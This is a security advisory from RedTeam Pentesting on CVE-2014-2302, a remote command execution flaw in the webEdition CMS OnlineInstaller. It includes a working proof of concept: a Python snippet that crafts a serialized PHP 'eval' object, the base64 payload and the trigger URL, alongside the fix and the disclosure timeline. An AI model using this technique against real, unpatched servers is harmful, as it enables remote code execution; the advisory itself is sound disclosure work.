Kontakt

Kontaktieren Sie uns gerne

+49 241 510081-0
kontakt@redteam-pentesting.de
Kontaktformular
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

Remote Command Execution in webEdition CMS Installer Script

RedTeam Pentesting discovered a remote command execution vulnerability in the installer script of the webEdition CMS during a penetration test. If the installer script is not manually removed after installation, attackers cannot only reinstall webEdition, but also gain remote command execution.

Details

  • Product: webEdition CMS
  • Affected Versions: webEdition OnlineInstaller 2.8.0.0,
  • probably earlier versions, too
  • Fixed Versions: webEdition 6.2.7-s1 - 6.3.8-s1
  • Vulnerability Type: Remote Command Execution
  • Security Risk: high
  • Vendor URL: http://www.webedition.org
  • Vendor Status: fixed version released
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-004
  • Advisory Status: published
  • CVE: CVE-2014-2302
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2302

Introduction

“webEdition is a flexible CMS for companies of every size. It offers a great amount of functionality and can be flexibly customized for individual needs. It is ideally suited for users who want to operate their website comfortably. Even the creation of custom web applications is easily possible with webEdition.”

(translated from the webEdition homepage)

More Details

The webEdition installation script is not deleted automatically at the end of the installation, even though it contains code to delete itself. While an attacker who finds this script could just destructively reinstall webEdition, it is also possible to use it to gain command execution unnoticed on an existing webEdition installation.

During installation, the installer first checks whether outgoing connections can be established by sending the following HTTP request to update.webedition.org:

GET /server/we/onlineInstallation.php?update_cmd=checkConnection&  HTTP/1.0
Host: update.webedition.org

The server at update.webedition.org replies with the following HTTP response, which contains base64-encoded data (formatted and shortened):

HTTP/1.1 200 OK
Date: Mon, 24 Feb 2014 10:34:56 GMT
Server: Apache/2.X.XX
X-Powered-By: PHP/5.X.XX
Connection: close
Content-Type: text/html

YTozOntzOjQ6IlR5cGUiO3M6ODoidGVtcGxhdGUiO3M6ODoiSGVhZGxpbmUiO3M6MzA6Ik9u
bGluZSBJbnN0YWxsZXIgdmVyc2lvbiBjaGVjayI7czo3OiJDb250ZW50IjtzOjM5ODoiCjxk
aXYgY2xhc3M9Im1lc3NhZ2VEaXYiPgpZb3UgYXJlIGN1cnJlbnRseSB1c2luZyBhbiBvbGQg

By decoding the response body it can be seen that it contains a serialized PHP object:

a:3:{s:4:"Type";s:8:"template";s:8:"Headline";s:30:"Online Installer
version check";s:7:"Content";s:398:"<div class="messageDiv">
You are currently [...]</a>.</div>";}

This PHP object is processed by the installation script based on its “Type” value. One of the “Type” values accepted by the installation script is “eval”, leading to the execution of PHP code which can be specified as the value of a field named “Code”, that is also part of the serialized object.

Using the Python library phpserialize, a PHP object can be crafted, which executes the function phpinfo() when it is received by the installation script:

$ python
>>> from phpserialize import dumps
>>> object = dumps({"Type": "eval", "Code": "<?php phpinfo();?>"})
>>> object.encode("base64")
'YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjtz
OjQ6\nImV2YWwiO30=\n'

The installer allows the usage of a proxy server, enabling attackers to intercept and arbitrarily modify HTTP requests issued by the installer and the corresponding responses by the host update.webedition.org. By setting a proxy server to use during the installation process which answers all requests with the base64-encoded serialized PHP object, the previously created PHP code is loaded and evaluated by the installation script, which leads to the execution of the attack payload. Due to the proxy server being saved in the HTTP session used by the installation script, execution of the code served by the proxy server can be triggered by opening the following URL:

http://www.example.com/OnlineInstaller/setup.php?&leWizard=DownloadInstaller

Proof of Concept

Use the OnlineInstaller at http://www.example.com/OnlineInstaller/setup.php to configure webEdition to use a system under your control as a proxy server. Configure the proxy to deliver the following file contents for all HTTP requests:

YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjtzOjQ6ImV2YWwiO30=

Reopen the following URL:

http://www.example.com/OnlineInstaller/setup.php?&leWizard=DownloadInstaller

After a redirect, phpinfo() output will be shown.

Workaround

The OnlineInstaller should be deleted or access to its URLs restricted.

Fix

Update to a version with the suffix -s1. Those versions are available as updates for releases between 6.2.7 and 6.3.8. The newest, updated version would therefore be 6.3.8-s1.

Note that the version check of webEdition might tell you that there is no update available and that you are running Version “6.3.8 (6.3.8.0 Release, SVN-Revision 6985). It will still tell you that the newest available version is “6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)”, so you can use the “Update-Repetition” function to get the fix for this vulnerability.

Also note that the update does not remove the OnlineInstaller, but modifies the login dialogue to remove the OnlineInstaller instead. You will need to open the login dialogue after installing the update to actually delete the OnlineInstaller. To be on the safe side, check the OnlineInstaller directory manually for any files that still need to be removed.

Security Risk

Attackers can not only use the OnlineInstaller to destructively reinstall webEdition, but can also run arbitrary code PHP code by setting their own proxy server in the OnlineInstaller and inject content that is used as a parameter for the PHP eval() function. Since this attacker-supplied code is executed on the webEdition server with the privileges of the web server, this is a high risk, especially because the attack is not as easy to detect as a reinstallation of webEdition by an attacker.

Timeline

  • 2014-02-20 Vulnerability identified
  • 2014-03-04 Customer approved disclosure to vendor
  • 2014-03-06 CVE number requested and assigned
  • 2014-03-07 Vendor notified
  • 2014-03-10 Vendor acknowledges vulnerability
  • 2014-05-20 Vendor announces fixed versions
  • 2014-05-28 Advisory released

References

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.